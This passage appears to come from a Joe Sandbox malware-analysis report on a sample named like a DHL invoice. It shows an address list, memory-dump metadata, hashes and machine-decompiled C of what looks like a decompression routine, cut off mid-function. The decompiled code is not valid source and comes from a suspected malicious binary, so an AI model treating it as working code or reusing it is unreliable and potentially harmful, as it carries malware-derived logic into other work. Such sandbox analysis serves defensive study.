                                        0x00406533
                                        0x00406538
                                        0x00406541
                                        0x00406554
                                        0x00406557
                                        0x00406560
                                        0x00406563
                                        0x0040658b
                                        0x0040658b
                                        0x0040658d
                                        0x0040659b
                                        0x0040659b
                                        0x0040659f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040658f
                                        0x0040658f
                                        0x00406592
                                        0x00406592
                                        0x00406593
                                        0x00406593
                                        0x00000000
                                        0x0040658f
                                        0x00406565
                                        0x00406569
                                        0x0040656e
                                        0x0040656e
                                        0x00406577
                                        0x0040657d
                                        0x0040657f
                                        0x00406582
                                        0x00000000
                                        0x00406588
                                        0x00406588
                                        0x00000000
                                        0x00406588
                                        0x00000000
                                        0x004065a5
                                        0x004065a5
                                        0x004065a9
                                        0x00406e55
                                        0x00000000
                                        0x00406e55
                                        0x004065b2
                                        0x004065c2
                                        0x004065c5
                                        0x004065c8
                                        0x004065c8
                                        0x004065c8
                                        0x004065cb
                                        0x004065cb
                                        0x004065cf
                                        0x00000000
                                        0x00000000
                                        0x004065d1
                                        0x004065d4
                                        0x004065d7
                                        0x00406601
                                        0x00406607
                                        0x0040660e
                                        0x00000000
                                        0x0040660e
                                        0x004065d9
                                        0x004065dd
                                        0x004065e0
                                        0x004065e5
                                        0x004065e5
                                        0x004065f0
                                        0x004065f6
                                        0x004065f8
                                        0x004065fb
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406640
                                        0x00406646
                                        0x00406649
                                        0x00406656
                                        0x0040665e
                                        0x00000000
                                        0x00000000
                                        0x00406615
                                        0x00406615
                                        0x00406619
                                        0x00406e64
                                        0x00000000
                                        0x00406e64
                                        0x00406625
                                        0x00406630
                                        0x00406630
                                        0x00406630
                                        0x00406633
                                        0x00406636
                                        0x00406639
                                        0x0040663c
                                        0x0040663e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cdb
                                        0x00406ce1
                                        0x00406ce4
                                        0x00406ce7
                                        0x00406d01
                                        0x00406d04
                                        0x00406d0a
                                        0x00406d15
                                        0x00406d15
                                        0x00406d17
                                        0x00406ce9
                                        0x00406ce9
                                        0x00406cf8
                                        0x00406cfc
                                        0x00406cfc
                                        0x00406d1a
                                        0x00406d21
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406d23
                                        0x00406d23
                                        0x00406d27
                                        0x00406ed6
                                        0x00000000
                                        0x00406ed6
                                        0x00406d33
                                        0x00406d3a
                                        0x00406d42
                                        0x00406d42
                                        0x00406d42
                                        0x00406d45
                                        0x00406d48
                                        0x00406d48
                                        0x00000000
                                        0x00000000
                                        0x00406666
                                        0x00406668
                                        0x0040666b
                                        0x004066dc
                                        0x004066df
                                        0x004066e2
                                        0x004066e9
                                        0x004066f3
                                        0x00000000
                                        0x004066f3
                                        0x0040666d
                                        0x00406671
                                        0x00406674
                                        0x00406676
                                        0x00406679
                                        0x0040667c
                                        0x0040667e
                                        0x00406681
                                        0x00406683
                                        0x00406688
                                        0x0040668b
                                        0x0040668e
                                        0x00406692
                                        0x00406699
                                        0x0040669c
                                        0x004066a3
                                        0x004066a7
                                        0x004066af
                                        0x004066af
                                        0x004066af
                                        0x004066a9
                                        0x004066a9
                                        0x004066a9
                                        0x0040669e
                                        0x0040669e
                                        0x0040669e
                                        0x004066b3
                                        0x004066b6
                                        0x004066d4
                                        0x004066d6
                                        0x00000000
                                        0x004066d6
                                        0x004066b8
                                        0x004066bb
                                        0x004066be
                                        0x004066c1
                                        0x004066c3
                                        0x004066c3
                                        0x004066c3
                                        0x004066c6
                                        0x004066c9
                                        0x004066cb
                                        0x004066cc
                                        0x004066cf
                                        0x00000000
                                        0x00000000
                                        0x00406905
                                        0x00406909
                                        0x00406927
                                        0x0040692a
                                        0x00406931
                                        0x00406934
                                        0x00406937
                                        0x0040693a
                                        0x0040693d
                                        0x00406940
                                        0x00406942
                                        0x00406949
                                        0x0040694a
                                        0x0040694c
                                        0x0040694f
                                        0x00406952
                                        0x00406955
                                        0x00406955
                                        0x0040695a
                                        0x00000000
                                        0x0040695a
                                        0x0040690b
                                        0x0040690e
                                        0x00406911
                                        0x0040691b
                                        0x00000000
                                        0x00000000
                                        0x0040696f
                                        0x00406973
                                        0x00406996
                                        0x00406999
                                        0x0040699c
                                        0x004069a6
                                        0x00406975
                                        0x00406975
                                        0x00406978
                                        0x0040697b
                                        0x0040697e
                                        0x0040698b
                                        0x0040698e
                                        0x0040698e
                                        0x00000000
                                        0x00000000
                                        0x004069b2
                                        0x004069b6
                                        0x00000000
                                        0x00000000
                                        0x004069bc
                                        0x004069c0
                                        0x00000000
                                        0x00000000
                                        0x004069c6
                                        0x004069c8
                                        0x004069cc
                                        0x004069cc
                                        0x004069cf
                                        0x004069d3
                                        0x00000000
                                        0x00000000
                                        0x00406a23
                                        0x00406a27
                                        0x00406a2e
                                        0x00406a31
                                        0x00406a34
                                        0x00406a3e
                                        0x00000000
                                        0x00406a3e
                                        0x00406a29
                                        0x00000000
                                        0x00000000
                                        0x00406a4a
                                        0x00406a4e
                                        0x00406a55
                                        0x00406a58
                                        0x00406a5b
                                        0x00406a50
                                        0x00406a50
                                        0x00406a50
                                        0x00406a5e
                                        0x00406a61
                                        0x00406a64
                                        0x00406a64
                                        0x00406a67
                                        0x00406a6a
                                        0x00406a6d
                                        0x00406a6d
                                        0x00406a70
                                        0x00406a77
                                        0x00406a7c
                                        0x00000000
                                        0x00000000
                                        0x00406b0a
                                        0x00406b0a
                                        0x00406b0e
                                        0x00406eac
                                        0x00000000
                                        0x00406eac
                                        0x00406b14
                                        0x00406b17
                                        0x00406b1a
                                        0x00406b1e
                                        0x00406b21
                                        0x00406b27
                                        0x00406b29
                                        0x00406b29
                                        0x00406b29
                                        0x00406b2c
                                        0x00406b2f
                                        0x00000000
                                        0x00000000
                                        0x004066ff
                                        0x004066ff
                                        0x00406703
                                        0x00406e70
                                        0x00000000
                                        0x00406e70
                                        0x00406709
                                        0x0040670c
                                        0x0040670f
                                        0x00406713
                                        0x00406716
                                        0x0040671c
                                        0x0040671e
                                        0x0040671e
                                        0x0040671e
                                        0x00406721
                                        0x00406724
                                        0x00406724
                                        0x00406727
                                        0x0040672a
                                        0x00000000
                                        0x00000000
                                        0x00406730
                                        0x00406736
                                        0x00000000
                                        0x00000000
                                        0x0040673c
                                        0x0040673c
                                        0x00406740
                                        0x00406743
                                        0x00406746
                                        0x00406749
                                        0x0040674c
                                        0x0040674d
                                        0x00406750
                                        0x00406752
                                        0x00406758
                                        0x0040675b
                                        0x0040675e
                                        0x00406761
                                        0x00406764
                                        0x00406767
                                        0x0040676a
                                        0x00406786
                                        0x00406789
                                        0x0040678c
                                        0x0040678f
                                        0x00406796
                                        0x0040679a
                                        0x0040679c
                                        0x004067a0
                                        0x0040676c
                                        0x0040676c
                                        0x00406770
                                        0x00406778
                                        0x0040677d
                                        0x0040677f
                                        0x00406781
                                        0x00406781
                                        0x004067a3
                                        0x004067aa
                                        0x004067ad
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b8
                                        0x004067b8
                                        0x004067bc
                                        0x00406e7c
                                        0x00000000
                                        0x00406e7c
                                        0x004067c2
                                        0x004067c5
                                        0x004067c8
                                        0x004067cc
                                        0x004067cf
                                        0x004067d5
                                        0x004067d7
                                        0x004067d7
                                        0x004067d7
                                        0x004067da
                                        0x004067dd
                                        0x004067dd
                                        0x004067dd
                                        0x004067e3
                                        0x00000000
                                        0x00000000
                                        0x004067e5
                                        0x004067e8
                                        0x004067eb
                                        0x004067ee
                                        0x004067f1
                                        0x004067f4
                                        0x004067f7
                                        0x004067fa
                                        0x004067fd
                                        0x00406800
                                        0x00406803
                                        0x0040681b
                                        0x0040681e
                                        0x00406821
                                        0x00406824
                                        0x00406824
                                        0x00406827
                                        0x0040682b
                                        0x0040682d
                                        0x00406805
                                        0x00406805
                                        0x0040680d
                                        0x00406812
                                        0x00406814
                                        0x00406816
                                        0x00406816
                                        0x00406830
                                        0x00406837
                                        0x0040683a
                                        0x00000000
                                        0x0040683c
                                        0x00000000
                                        0x0040683c
                                        0x0040683a
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00000000
                                        0x00000000
                                        0x0040687c
                                        0x0040687c
                                        0x00406880
                                        0x00406e88
                                        0x00000000
                                        0x00406e88
                                        0x00406886
                                        0x00406889
                                        0x0040688c
                                        0x00406890
                                        0x00406893
                                        0x00406899
                                        0x0040689b
                                        0x0040689b
                                        0x0040689b
                                        0x0040689e
                                        0x004068a1
                                        0x004068a1
                                        0x004068a7
                                        0x00406845
                                        0x00406845
                                        0x00406848
                                        0x00000000
                                        0x00406848
                                        0x004068a9
                                        0x004068a9
                                        0x004068ac
                                        0x004068af
                                        0x004068b2
                                        0x004068b5
                                        0x004068b8
                                        0x004068bb
                                        0x004068be
                                        0x004068c1
                                        0x004068c4
                                        0x004068c7
                                        0x004068df
                                        0x004068e2
                                        0x004068e5
                                        0x004068e8
                                        0x004068e8
                                        0x004068eb
                                        0x004068ef
                                        0x004068f1
                                        0x004068c9
                                        0x004068c9
                                        0x004068d1
                                        0x004068d6
                                        0x004068d8
                                        0x004068da
                                        0x004068da
                                        0x004068f4
                                        0x004068fb
                                        0x004068fe
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406b8d
                                        0x00406b8d
                                        0x00406b91
                                        0x00406eb8
                                        0x00000000
                                        0x00406eb8
                                        0x00406b97
                                        0x00406b9a
                                        0x00406b9d
                                        0x00406ba1
                                        0x00406ba4
                                        0x00406baa
                                        0x00406bac
                                        0x00406bac
                                        0x00406bac
                                        0x00406baf
                                        0x00000000
                                        0x00000000
                                        0x0040695d
                                        0x0040695d
                                        0x00406960
                                        0x00000000
                                        0x00000000
                                        0x00406c9c
                                        0x00406ca0
                                        0x00406cc2
                                        0x00406cc5
                                        0x00406ccf
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00406ca2
                                        0x00406ca5
                                        0x00406ca9
                                        0x00406cac
                                        0x00406cac
                                        0x00406caf
                                        0x00000000
                                        0x00000000
                                        0x00406d59
                                        0x00406d5d
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d82
                                        0x00406d89
                                        0x00406d90
                                        0x00406d90
                                        0x00000000
                                        0x00406d90
                                        0x00406d5f
                                        0x00406d62
                                        0x00406d65
                                        0x00406d68
                                        0x00406d6f
                                        0x00406cb3
                                        0x00406cb3
                                        0x00406cb6
                                        0x00000000
                                        0x00000000
                                        0x00406e4a
                                        0x00406e4d
                                        0x00000000
                                        0x00000000
                                        0x00406a84
                                        0x00406a86
                                        0x00406a8d
                                        0x00406a8e
                                        0x00406a90
                                        0x00406a93
                                        0x00000000
                                        0x00000000
                                        0x00406a9b
                                        0x00406a9e
                                        0x00406aa1
                                        0x00406aa3
                                        0x00406aa5
                                        0x00406aa5
                                        0x00406aa6
                                        0x00406aa9
                                        0x00406ab0
                                        0x00406ab3
                                        0x00406ac1
                                        0x00000000
                                        0x00000000
                                        0x00406d97
                                        0x00406d97
                                        0x00406d9a
                                        0x00406da1
                                        0x00000000
                                        0x00000000
                                        0x00406da6
                                        0x00406da6
                                        0x00406daa
                                        0x00406ee2
                                        0x00000000
                                        0x00406ee2
                                        0x00406db0
                                        0x00406db3
                                        0x00406db6
                                        0x00406dba
                                        0x00406dbd
                                        0x00406dc3
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc8
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dce
                                        0x00406dce
                                        0x00406dd2
                                        0x00406e32
                                        0x00406e35
                                        0x00406e3a
                                        0x00406e3b
                                        0x00406e3d
                                        0x00406e3f
                                        0x00406e42
                                        0x00406d4e
                                        0x00406d4e
                                        0x00000000
                                        0x00406d4e
                                        0x00406dd4
                                        0x00406dda
                                        0x00406ddd
                                        0x00406de0
                                        0x00406de3
                                        0x00406de6
                                        0x00406de9
                                        0x00406dec
                                        0x00406def
                                        0x00406df2
                                        0x00406df5
                                        0x00406e0e
                                        0x00406e11
                                        0x00406e14
                                        0x00406e17
                                        0x00406e1b
                                        0x00406e1d
                                        0x00406e1d
                                        0x00406e1e
                                        0x00406e21
                                        0x00406df7
                                        0x00406df7
                                        0x00406dff
                                        0x00406e04
                                        0x00406e06
                                        0x00406e09
                                        0x00406e09
                                        0x00406e24
                                        0x00406e2b
                                        0x00000000
                                        0x00406e2d
                                        0x00000000
                                        0x00406e2d
                                        0x00000000
                                        0x00406ac9
                                        0x00406acc
                                        0x00406b02
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c35
                                        0x00406c35
                                        0x00406c38
                                        0x00406c3a
                                        0x00406ec4
                                        0x00000000
                                        0x00406ec4
                                        0x00406c40
                                        0x00406c43
                                        0x00000000
                                        0x00000000
                                        0x00406c49
                                        0x00406c4d
                                        0x00406c50
                                        0x00406c50
                                        0x00406c50
                                        0x00000000
                                        0x00406c50
                                        0x00406ace
                                        0x00406ad0
                                        0x00406ad2
                                        0x00406ad4
                                        0x00406ad7
                                        0x00406ad8
                                        0x00406ada
                                        0x00406adc
                                        0x00406adf
                                        0x00406ae2
                                        0x00406af8
                                        0x00406afd
                                        0x00406b35
                                        0x00406b35
                                        0x00406b39
                                        0x00406b65
                                        0x00406b67
                                        0x00406b6e
                                        0x00406b71
                                        0x00406b74
                                        0x00406b74
                                        0x00406b79
                                        0x00406b79
                                        0x00406b7b
                                        0x00406b7e
                                        0x00406b85
                                        0x00406b88
                                        0x00406bb5
                                        0x00406bb5
                                        0x00406bb8
                                        0x00406bbb
                                        0x00406c2f
                                        0x00406c2f
                                        0x00406c2f
                                        0x00000000
                                        0x00406c2f
                                        0x00406bbd
                                        0x00406bc3
                                        0x00406bc6
                                        0x00406bc9
                                        0x00406bcc
                                        0x00406bcf
                                        0x00406bd2
                                        0x00406bd5
                                        0x00406bd8
                                        0x00406bdb
                                        0x00406bde
                                        0x00406bf7
                                        0x00406bf9
                                        0x00406bfc
                                        0x00406bfd
                                        0x00406c00
                                        0x00406c02
                                        0x00406c05
                                        0x00406c07
                                        0x00406c09
                                        0x00406c0c
                                        0x00406c0e
                                        0x00406c11
                                        0x00406c15
                                        0x00406c17
                                        0x00406c17
                                        0x00406c18
                                        0x00406c1b
                                        0x00406c1e
                                        0x00406be0
                                        0x00406be0
                                        0x00406be8
                                        0x00406bed
                                        0x00406bef
                                        0x00406bf2
                                        0x00406bf2
                                        0x00406c21
                                        0x00406c28
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00000000
                                        0x00406c2a
                                        0x00000000
                                        0x00406c2a
                                        0x00406c28
                                        0x00406b3b
                                        0x00406b3e
                                        0x00406b40
                                        0x00406b43
                                        0x00406b46
                                        0x00406b49
                                        0x00406b4b
                                        0x00406b4e
                                        0x00406b51
                                        0x00406b51
                                        0x00406b54
                                        0x00406b54
                                        0x00406b57
                                        0x00406b5e
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00000000
                                        0x00406b60
                                        0x00000000
                                        0x00406b60
                                        0x00406b5e
                                        0x00406ae4
                                        0x00406ae7
                                        0x00406ae9
                                        0x00406aec
                                        0x00000000
                                        0x00000000
                                        0x0040684b
                                        0x0040684b
                                        0x0040684f
                                        0x00406e94
                                        0x00000000
                                        0x00406e94
                                        0x00406855
                                        0x00406858
                                        0x0040685b
                                        0x0040685e
                                        0x00406861
                                        0x00406864
                                        0x00406867
                                        0x00406869
                                        0x0040686c
                                        0x0040686f
                                        0x00406872
                                        0x00406874
                                        0x00406874
                                        0x00406874
                                        0x00000000
                                        0x00000000
                                        0x004069d6
                                        0x004069d6
                                        0x004069da
                                        0x00406ea0
                                        0x00000000
                                        0x00406ea0
                                        0x004069e0
                                        0x004069e3
                                        0x004069e6
                                        0x004069e9
                                        0x004069eb
                                        0x004069eb
                                        0x004069eb
                                        0x004069ee
                                        0x004069f1
                                        0x004069f4
                                        0x004069f7
                                        0x004069fa
                                        0x004069fd
                                        0x004069fe
                                        0x00406a00
                                        0x00406a00
                                        0x00406a00
                                        0x00406a03
                                        0x00406a06
                                        0x00406a09
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0f
                                        0x00406a11
                                        0x00406a11
                                        0x00000000
                                        0x00000000
                                        0x00406c53
                                        0x00406c53
                                        0x00406c53
                                        0x00406c57
                                        0x00000000
                                        0x00000000
                                        0x00406c5d
                                        0x00406c60
                                        0x00406c63
                                        0x00406c66
                                        0x00406c68
                                        0x00406c68
                                        0x00406c68
                                        0x00406c6b
                                        0x00406c6e
                                        0x00406c71
                                        0x00406c74
                                        0x00406c77
                                        0x00406c7a
                                        0x00406c7b
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c80
                                        0x00406c83
                                        0x00406c86
                                        0x00406c89
                                        0x00406c8c
                                        0x00406c90
                                        0x00406c92
                                        0x00406c95
                                        0x00000000
                                        0x00406c97
                                        0x00406a14
                                        0x00406a14
                                        0x00000000
                                        0x00406a14
                                        0x00406c95
                                        0x00406eca
                                        0x00406eec
                                        0x00406ef2
                                        0x00406ef4
                                        0x00406efb
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x00406f01
                                        0x00406f01
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
                                        • Instruction ID: 64fae73fcf261b5a29c0697abf595a3f572636c651b32177eb72ec05398ad39b
                                        • Opcode Fuzzy Hash: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
                                        • Instruction Fuzzy Hash: 39817831D04229DBEF24CFA8D8447ADBBB0FB44305F21816AD856BB2C1C7789A96DF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E00406905() {
                                        				signed int _t539;
                                        				unsigned short _t540;
                                        				signed int _t541;
                                        				void _t542;
                                        				signed int _t543;
                                        				signed int _t544;
                                        				signed int _t573;
                                        				signed int _t576;
                                        				signed int _t597;
                                        				signed int* _t614;
                                        				void* _t621;
                                        
                                        				L0:
                                        				while(1) {
                                        					L0:
                                        					if( *(_t621 - 0x40) != 1) {
                                        						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                        						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                        						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                        						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                        						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                        						_t539 =  *(_t621 - 4) + 0x664;
                                        						 *(_t621 - 0x58) = _t539;
                                        						goto L68;
                                        					} else {
                                        						 *(__ebp - 0x84) = 8;
                                        						while(1) {
                                        							L132:
                                        							 *(_t621 - 0x54) = _t614;
                                        							while(1) {
                                        								L133:
                                        								_t540 =  *_t614;
                                        								_t597 = _t540 & 0x0000ffff;
                                        								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                        								if( *(_t621 - 0xc) >= _t573) {
                                        									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                        									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                        									 *(_t621 - 0x40) = 1;
                                        									_t541 = _t540 - (_t540 >> 5);
                                        									 *_t614 = _t541;
                                        								} else {
                                        									 *(_t621 - 0x10) = _t573;
                                        									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                        									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                        								}
                                        								if( *(_t621 - 0x10) >= 0x1000000) {
                                        									goto L139;
                                        								}
                                        								L137:
                                        								if( *(_t621 - 0x6c) == 0) {
                                        									 *(_t621 - 0x88) = 5;
                                        									L170:
                                        									_t576 = 0x22;
                                        									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                        									_t544 = 0;
                                        									L172:
                                        									return _t544;
                                        								}
                                        								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                        								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                        								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                        								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                        								L139:
                                        								_t542 =  *(_t621 - 0x84);
                                        								while(1) {
                                        									 *(_t621 - 0x88) = _t542;
                                        									while(1) {
                                        										L1:
                                        										_t543 =  *(_t621 - 0x88);
                                        										if(_t543 > 0x1c) {
                                        											break;
                                        										}
                                        										switch( *((intOrPtr*)(_t543 * 4 +  &M00406F09))) {
                                        											case 0:
                                        												if( *(_t621 - 0x6c) == 0) {
                                        													goto L170;
                                        												}
                                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                        												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                        												_t543 =  *( *(_t621 - 0x70));
                                        												if(_t543 > 0xe1) {
                                        													goto L171;
                                        												}
                                        												_t547 = _t543 & 0x000000ff;
                                        												_push(0x2d);
                                        												asm("cdq");
                                        												_pop(_t578);
                                        												_push(9);
                                        												_pop(_t579);
                                        												_t617 = _t547 / _t578;
                                        												_t549 = _t547 % _t578 & 0x000000ff;
                                        												asm("cdq");
                                        												_t612 = _t549 % _t579 & 0x000000ff;
                                        												 *(_t621 - 0x3c) = _t612;
                                        												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                        												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                        												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                        												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                        													L10:
                                        													if(_t620 == 0) {
                                        														L12:
                                        														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                        														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                        														goto L15;
                                        													} else {
                                        														goto L11;
                                        													}
                                        													do {
                                        														L11:
                                        														_t620 = _t620 - 1;
                                        														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                        													} while (_t620 != 0);
                                        													goto L12;
                                        												}
                                        												if( *(_t621 - 4) != 0) {
                                        													GlobalFree( *(_t621 - 4)); // executed
                                        												}
                                        												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                        												 *(_t621 - 4) = _t543;
                                        												if(_t543 == 0) {
                                        													goto L171;
                                        												} else {
                                        													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                        													goto L10;
                                        												}
                                        											case 1:
                                        												L13:
                                        												__eflags =  *(_t621 - 0x6c);
                                        												if( *(_t621 - 0x6c) == 0) {
                                        													 *(_t621 - 0x88) = 1;
                                        													goto L170;
                                        												}
                                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                        												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                        												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                        												_t45 = _t621 - 0x48;
                                        												 *_t45 =  *(_t621 - 0x48) + 1;
                                        												__eflags =  *_t45;
                                        												L15:
                                        												if( *(_t621 - 0x48) < 4) {
                                        													goto L13;
                                        												}
                                        												_t555 =  *(_t621 - 0x40);
                                        												if(_t555 ==  *(_t621 - 0x74)) {
                                        													L20:
                                        													 *(_t621 - 0x48) = 5;
                                        													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                        													goto L23;
                                        												}
                                        												 *(_t621 - 0x74) = _t555;
                                        												if( *(_t621 - 8) != 0) {
                                        													GlobalFree( *(_t621 - 8)); // executed
                                        												}
                                        												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                        												 *(_t621 - 8) = _t543;
                                        												if(_t543 == 0) {
                                        													goto L171;
                                        												} else {
                                        													goto L20;
                                        												}
                                        											case 2:
                                        												L24:
                                        												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                        												 *(_t621 - 0x84) = 6;
                                        												 *(_t621 - 0x4c) = _t562;
                                        												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                        												goto L132;
                                        											case 3:
                                        												L21:
                                        												__eflags =  *(_t621 - 0x6c);
                                        												if( *(_t621 - 0x6c) == 0) {
                                        													 *(_t621 - 0x88) = 3;
                                        													goto L170;
                                        												}
                                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                        												_t67 = _t621 - 0x70;
                                        												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                        												__eflags =  *_t67;
                                        												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                        												L23:
                                        												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                        												if( *(_t621 - 0x48) != 0) {
                                        													goto L21;
                                        												}
                                        												goto L24;
                                        											case 4:
                                        												L133:
                                        												_t540 =  *_t614;
                                        												_t597 = _t540 & 0x0000ffff;
                                        												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                        												if( *(_t621 - 0xc) >= _t573) {
                                        													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                        													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                        													 *(_t621 - 0x40) = 1;
                                        													_t541 = _t540 - (_t540 >> 5);
                                        													 *_t614 = _t541;
                                        												} else {
                                        													 *(_t621 - 0x10) = _t573;
                                        													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                        													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                        												}
                                        												if( *(_t621 - 0x10) >= 0x1000000) {
                                        													goto L139;
                                        												}
                                        											case 5:
                                        												goto L137;
                                        											case 6:
                                        												__edx = 0;
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													__eax =  *(__ebp - 4);
                                        													__ecx =  *(__ebp - 0x38);
                                        													 *(__ebp - 0x34) = 1;
                                        													 *(__ebp - 0x84) = 7;
                                        													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                        													L132:
                                        													 *(_t621 - 0x54) = _t614;
                                        													goto L133;
                                        												}
                                        												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                        												__esi =  *(__ebp - 0x60);
                                        												__cl = 8;
                                        												__cl = 8 -  *(__ebp - 0x3c);
                                        												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                        												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                        												__ecx =  *(__ebp - 0x3c);
                                        												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                        												__ecx =  *(__ebp - 4);
                                        												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                        												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                        												__eflags =  *(__ebp - 0x38) - 4;
